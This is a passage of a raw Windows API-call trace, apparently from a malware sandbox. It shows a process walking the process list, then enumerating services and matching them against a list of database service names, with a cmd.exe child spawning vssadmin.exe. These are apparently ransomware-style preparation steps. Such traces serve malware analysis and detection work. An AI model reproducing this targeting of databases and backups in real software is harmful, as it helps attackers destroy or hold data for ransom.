lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0220.463] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0220.463] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0220.464] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0220.464] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.465] lstrlenW (lpString="svchost.exe") returned 11 [0220.465] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.466] lstrlenW (lpString="dwm.exe") returned 7 [0220.466] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.466] lstrlenW (lpString="svchost.exe") returned 11 [0220.466] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.467] lstrlenW (lpString="svchost.exe") returned 11 [0220.467] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.468] lstrlenW (lpString="svchost.exe") returned 11 [0220.468] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.469] lstrlenW (lpString="svchost.exe") returned 11 [0220.469] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.469] lstrlenW (lpString="svchost.exe") returned 11 [0220.469] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.470] lstrlenW (lpString="svchost.exe") returned 11 [0220.470] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.471] lstrlenW (lpString="svchost.exe") returned 11 [0220.471] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.472] lstrlenW (lpString="svchost.exe") returned 11 [0220.472] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.472] lstrlenW (lpString="svchost.exe") returned 11 [0220.472] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.473] lstrlenW (lpString="spoolsv.exe") returned 11 [0220.473] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.474] lstrlenW (lpString="svchost.exe") returned 11 [0220.474] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.475] lstrlenW (lpString="svchost.exe") returned 11 [0220.475] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.475] lstrlenW (lpString="audiodg.exe") returned 11 [0220.475] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0220.476] lstrlenW (lpString="sihost.exe") returned 10 [0220.476] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.477] lstrlenW (lpString="svchost.exe") returned 11 [0220.477] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0220.478] lstrlenW (lpString="taskhostw.exe") returned 13 [0220.478] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.478] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0220.479] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0220.479] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0220.479] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.480] lstrlenW (lpString="explorer.exe") returned 12 [0220.480] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0220.481] lstrlenW (lpString="Memory Compression") returned 18 [0220.481] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0220.481] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0220.481] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0220.482] lstrlenW (lpString="SearchUI.exe") returned 12 [0220.482] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0220.483] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0220.483] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.484] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0220.484] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0220.484] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0220.484] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0220.485] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0220.485] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0220.487] lstrlenW (lpString="conhost.exe") returned 11 [0220.487] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0220.488] lstrlenW (lpString="roof competitive.exe") returned 20 [0220.488] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0220.488] lstrlenW (lpString="trustees.exe") returned 12 [0220.488] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0220.489] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0220.489] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0220.490] lstrlenW (lpString="isbn.exe") returned 8 [0220.490] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0220.491] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0220.491] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0220.491] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0220.492] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0220.492] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0220.492] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0220.493] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0220.493] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0220.494] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0220.494] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0220.494] lstrlenW (lpString="playstation iraq.exe") returned 20 [0220.495] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0220.495] lstrlenW (lpString="harbor.exe") returned 10 [0220.495] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0220.496] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0220.496] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0220.497] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0220.497] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0220.498] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0220.498] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0220.498] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0220.498] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0220.499] lstrlenW (lpString="larent.exe") returned 10 [0220.499] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0220.500] lstrlenW (lpString="stereo.exe") returned 10 [0220.500] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0220.501] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0220.501] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0220.502] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0220.502] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0220.502] lstrlenW (lpString="state.exe") returned 9 [0220.502] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0220.503] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0220.503] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.504] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0220.504] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0220.505] lstrlenW (lpString="taskhostw.exe") returned 13 [0220.505] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0220.506] lstrlenW (lpString="sppsvc.exe") returned 10 [0220.506] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.507] lstrlenW (lpString="svchost.exe") returned 11 [0220.507] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0220.508] lstrlenW (lpString="Pg.exe") returned 6 [0220.508] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0220.509] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0220.509] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0220.510] lstrlenW (lpString="conhost.exe") returned 11 [0220.510] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0220.511] lstrlenW (lpString="cmd.exe") returned 7 [0220.511] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0220.511] lstrlenW (lpString="conhost.exe") returned 11 [0220.511] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0220.512] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0220.512] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0220.513] lstrlenW (lpString="conhost.exe") returned 11 [0220.513] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0220.514] lstrlenW (lpString="vssadmin.exe") returned 12 [0220.514] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0220.515] CloseHandle (hObject=0x430) returned 1 [0220.515] Sleep (dwMilliseconds=0x1f4) [0221.017] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bb70 [0221.018] EnumServicesStatusExW (in: hSCManager=0x236bb70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0221.018] GetLastError () returned 0xea [0221.018] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0221.018] EnumServicesStatusExW (in: hSCManager=0x236bb70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0221.019] CloseServiceHandle (hSCObject=0x236bb70) returned 1 [0221.019] lstrlenW (lpString="Appinfo") returned 7 [0221.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0221.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0221.019] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0221.019] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0221.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0221.019] lstrlenW (lpString="AppXSvc") returned 7 [0221.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0221.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0221.019] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0221.019] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0221.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0221.019] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0221.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0221.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 